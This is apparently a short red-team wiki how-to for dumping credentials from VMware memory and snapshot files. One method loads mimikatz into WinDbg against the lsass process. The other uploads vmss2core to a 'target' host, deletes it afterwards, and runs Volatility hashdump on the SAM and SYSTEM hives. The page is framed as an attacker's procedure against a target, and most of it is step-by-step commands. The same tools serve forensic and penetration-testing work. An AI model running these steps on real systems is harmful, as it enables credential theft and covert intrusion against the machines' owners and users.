## LSASS VMware WinDbg Memory/Snapshot Images SCENARIO: You are able to retrieve from target a VMware .vmem file and would like to dump the in-memory hashes and credentials. STEP 1: Install WinDbg debugging tool and bin2dmp.exe: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index https://github.com/arizvisa/windows-binary-tools STEP 2: Download the mimikatz release: https://github.com/gentilkiwi/mimikatz/releases STEP 3: Covert your ".vmem" file into a dump file: ``` bin2dmp.exe "SVR2012r2-l.vmem" vmware.dmp ``` STEP 4: Start WinDbg and "File -> Open Crash Dump" your "vmware.dmp" file STEP 5: Load the correct mimikatz bitness (x86/x64) library 'mimilib.dll': ``` kd> .load mimilib.dll ``` STEP 6: Find the lsass process in the memory dump: ``` kd> !process 0 0 lsass.exe ``` STEP 7: Read process correct memory location (Example PROCESS fffffa800e0b3b30) ``` kd> .process /r /p fffffa800e0b3b30 ``` STEP 8: Launch mimikatz in the process to dump in-memory hashes and credentials: ``` kd> I mimikatz ``` ## Remotely Hashdump VMware Volatility Memory/Snapshot Images SCENARIO: You are unable to pull down the +lGB target VM files due to bandwidth restrictions. Your other option is to load the tools you need onto the target machine where the VM files are stored to extract hashes. STEP 1: Install and review the following: VMware Snapshot and Saved State Analysis http://volatility-labs.blogspot.be/2013/05/movp-ii-13-vmware-snapshot-andsaved.html Volatility Memory Forensics Tool https://www.volatilityfoundation.org/releases Vmss2core - VMWare Labs https://labs.vmware.com/flings/vmss2core STEP 2: Upload vmss2core.exe to your target and execute the following to dump the a VM in a "suspended state". Once the dump is created delete the vmss2core.exe. Be sure to note the architecture displayed (Example Win7SP1x86) because you will need that in STEP 3. !!Caveats!! VM in a suspended state you need both the .vmss and the .vmem files. VM snapshot you need .vmsn and .vmem files. ``` C:\temp>vmss2core.exe -W /Users/admin/Documents/VMware/Windows_7.vmss /Users/admin/Documents/VMware/Windows_7.vmem ``` STEP 3: Load the standalone Volatity tool onto the target system and execute it against the newly created .dmp file. Note the "Win:" architecture: ``` C:\temp> volatility_2.6_x64.exe imageinfo -f VMmemory.dmp ``` STEP 4: Now you need to get the memory locations for the registry hives we care about SYSTEM & SAM: ``` C:\temp> volatility_2.6_x64.exe hivelist -f VMmemory.dmp --profile=Win7SP1x86 Example 0x86alc008 0x270ed008 \REGISTRY\MACHINE\SYSTEM 0x87164518 0x241cc518 \SystemRoot\System32\Config\SAM ``` STEP 5: You can now execute Volatility "hashdump" on those memory locations to retrieve user account hashes: ``` C:\temp> volatility_2.6_x64.exe hashdump -f VMmemory.dmp --profile=Win7SP1x86 sys-offset=0x86alc008 sam-offset=0x87164518 ``` [[Home]] #howto